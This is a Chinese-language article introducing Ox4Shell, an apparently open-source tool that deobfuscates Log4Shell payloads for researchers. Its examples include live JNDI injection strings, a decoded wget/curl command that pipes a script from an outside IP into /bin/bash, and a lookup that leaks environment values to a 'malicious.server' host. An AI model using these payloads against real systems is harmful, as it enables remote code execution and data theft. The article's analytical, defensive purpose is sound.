Ox4Shell是一款针对Log4Shell Payload代码反混淆工具,自从Log4Shell漏洞(CVE-2021-44228)被发现之后,很多工具都开始尝试对Log4Shell Payload进行混淆处理,以便更好地利用这个漏洞去实施攻击,这也给广大研究人员带来了很大的麻烦。
该工具旨在帮助广大研究人员查看经过混淆处理的Log4Shell Payload的真实内容。比如说,下面这个Payload已经经过了混淆处理:
${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:[email protected]@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.mQ:[email protected]:-z}3z${uY)u:7S2)P4ihH:[email protected]PrW:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}
(向右滑动、查看更多)
运行Ox4Shell之后,上述Payload便会被转换成直观易读的形式:
${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}
除此之外,该工具还可以识别和解码Base64命令,比如说下列经过混淆处理的Payload:
${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}
运行Ox4Shell之后,该工具便能够揭示攻击者的真正意图:
${jndi:ldap://1.1.1.1:1389/Basic/(wget -O - http://185.250.148.157:8005/acc||curl -o - http://185.250.148.157:8005/acc)|/bin/bash
广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/ox-eye/Ox4Shell.git
~/Ox4Shell » python ox4shell.py --help
usage: ox4shell [-h] [-d] [-m MOCK] [--max-depth MAX_DEPTH] [--decode-base64] (-p PAYLOAD | -f FILE)
____ _ _ _____ _ _ _
/ __ \ | || | / ____| | | | |
| | | |_ _| || || (___ | |__ ___| | |
| | | \ \/ /__ _\___ \| '_ \ / _ \ | |
| |__| |> < | | ____) | | | | __/ | |
\____//_/\_\ |_||_____/|_| |_|\___|_|_|
Ox4Shell - Deobfuscate Log4Shell payloads with ease.
Created by https://oxeye.io
General:
-h, --help 显示工具帮助信息和退出
-d, --debug 启用调试模式 (默认: False)
-m MOCK, --mock MOCK 模拟数据JSON文件路径,用于替换Payload重的特定信息 (默认: mock.json)
--max-depth MAX_DEPTH
针对Payload执行的最大迭代次数 (默认: 150)
--decode-base64 包含待解码Base64数据的PayloadP (默认: False)
Targets:
Choose which target payloads to run Ox4Shell on
-p PAYLOAD, --payload PAYLOAD
待反混淆的单个 (默认: None)
-f FILE, --file FILE 包含待反混淆的Payload文件路径 (默认: None)
Log4j代码库有几个独特的查询函数,允许用户查找环境变量和Java进程的运行时信息等。这种功能将允许攻击者能够探测特定信息,而这些信息可以唯一识别目标设备。
Ox4Shell使用了mock.json文件来向特定查询函数中插入常见值,比如说,如果Payload包含一个${env:HOME}值,我们就可以使用自定义模拟数据来替换它了。
默认提供的模拟数据如下:
{
"hostname": "ip-127.0.0.1",
"env": {
"aws_profile": "staging",
"user": "ubuntu",
"pwd": "/opt/",
"path": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin"
},
"sys": {
"java.version": "16.0.2",
"user.name": "ubuntu"
},
"java": {
"version": "Java version 16.0.2",
"runtime": "OpenJDK Runtime Environment (build 1.8.0_181-b13) from Oracle Corporation",
"vm": "OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)",
"os": "Linux 5.10.47-linuxkit unknown, architecture: amd64-64",
"locale": "default locale: en_US, platform encoding: UTF-8",
"hw": "processors: 1, architecture: amd64-64"
}
}
(向右滑动、查看更多)
比如说,我们可以使用Ox4Shell的模拟数据能力来对下列Payload进行反混淆处理:
~/Ox4Shell >> python ox4shell.py -p "\${jndi:ldap://\${sys:java.version}.\${env:AWS_PROFILE}.malicious.server/a}"
${jndi:ldap://16.0.2.staging.malicious.server/a}
(向右滑动、查看更多)
我们建议使用提供的文件(-f)来运行Ox4Shell,而不要使用(-p)直接提供Payload,因为特定的Shell环境可能会转义掉重要字符。
本项目的开发与发布遵循MIT开源许可证协议。
Ox4Shell:https://github.com/ox-eye/Ox4Shell
https://twitter.com/Daniel_Abeles
https://twitter.com/ron_vider
精彩推荐